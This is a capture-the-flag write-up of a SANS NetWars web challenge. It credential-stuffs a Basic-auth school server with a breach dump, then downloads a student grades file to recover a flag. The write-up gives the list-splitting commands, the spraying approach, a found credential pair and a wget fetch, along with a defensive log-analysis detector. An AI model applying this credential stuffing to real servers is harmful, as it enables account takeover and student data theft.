School Admin (Web)

Challenge

  • Event: SANS NetWars — Web
  • Category: Web
  • Goal: use a provided breached-credential file to log into a school web server, then recover a flag from the data behind it

Writeup

Recon

Fingerprinting the target shows nginx fronting an HTTP Basic auth realm:

whatweb https://<school-host>/
# [401 Unauthorized] HTTPServer[nginx/1.24.0], WWW-Authenticate[School Administrators Only][Basic]

The prompt: use the attached breached file to credential-stuff the server. Which username logs you in? (The valid username has no domain, e.g. asmith, not asmith@<domain>.)

Credential stuffing

The breach dump is email:password per line. Split it into username and password lists, stripping the domain from each address:

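# usernames: the local part of each address (everything before the @)
awk -F '@' '{print $1}' credlist > users.txt
# passwords: everything after the first colon, so a password containing ':' is not truncated
awk -F ':' '{print substr($0, length($1) + 2)}' credlist > pass.txt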

HTTP Basic auth is just a base64-encoded user:pass in the Authorization header, so the lists are sprayed against the realm (e.g. with Burp Intruder over the Authorization: Basic §§ payload position, or ffuf/hydra). One pair returns 200:

jhealy:DramaCoach2024
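
Seen from the server side, the spray above leaves a clear trace in the nginx access log: one source failing Basic auth under many different usernames, then a single success. The detector below is an added example, not part of the original writeup. It assumes nginx's default combined log format, where $remote_user records the supplied Basic-auth username even on a 401; the log lines, IPs, usernames and threshold are constructed.

```python
import re
from collections import defaultdict

# nginx "combined" log format: addr - user [time] "request" status bytes ...
LINE = re.compile(r'^(\S+) - (\S+) \[[^\]]+\] "[^"]*" (\d{3}) ')

# Constructed sample (documentation IPs, made-up usernames), not challenge data.
SAMPLE_LOG = [
    f'203.0.113.7 - user{i:02d} [10/Mar/2025:10:00:{i:02d} +0000] '
    '"GET / HTTP/1.1" 401 179 "-" "-"'
    for i in range(1, 7)
] + [
    # the spraying source finally lands on a valid pair
    '203.0.113.7 - user07 [10/Mar/2025:10:00:07 +0000] "GET / HTTP/1.1" 200 512 "-" "-"',
    # a legitimate user who mistypes once, then succeeds
    '198.51.100.20 - staff1 [10/Mar/2025:10:01:00 +0000] "GET / HTTP/1.1" 401 179 "-" "-"',
    '198.51.100.20 - staff1 [10/Mar/2025:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "-"',
    # a browser's first request, sent without an Authorization header
    '198.51.100.21 - - [10/Mar/2025:10:02:00 +0000] "GET / HTTP/1.1" 401 179 "-" "-"',
]

def find_stuffing(lines, min_users=5):
    """Flag source IPs that fail Basic auth under many distinct usernames.

    Returns {ip: {"failed_users": n, "compromised": [usernames]}} where
    "compromised" lists accounts that got a 2xx from that IP after it had
    already crossed the min_users threshold (assumed value, tune per site).
    """
    failed = defaultdict(set)   # ip -> usernames rejected with 401
    hits = defaultdict(list)    # ip -> usernames accepted after the spray
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue            # not in combined format, ignore
        ip, user, status = m.group(1), m.group(2), int(m.group(3))
        if user == "-":
            continue            # no credentials were supplied
        if status == 401:
            failed[ip].add(user)
        elif 200 <= status < 300 and len(failed[ip]) >= min_users:
            if user not in hits[ip]:
                hits[ip].append(user)
    return {ip: {"failed_users": len(users), "compromised": hits[ip]}
            for ip, users in failed.items() if len(users) >= min_users}

if __name__ == "__main__":
    print(find_stuffing(SAMPLE_LOG))
```

Any account listed under "compromised" needs a password reset, and the source address is a candidate for rate limiting or blocking at the proxy.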

Looting the data

Authenticated, the admin area exposes a grades export:

wget --header='Authorization: Basic <base64 of jhealy:DramaCoach2024>' \
  https://<school-host>/student-grades.json

The file holds ~673 student records. The flag is tucked into the comment field of one record (PII redacted):

{
  "studentid": "<redacted>",
  "first_name": "<redacted>",
  "last_name": "<redacted>",
  "comment": "Demonstrates an eagerness to learn... NetWars{aqtssigbjEnkoLNwSwQc}."
}

Live session cookies and the full student roster from the original run have been omitted; only the technique and challenge flag are reproduced here.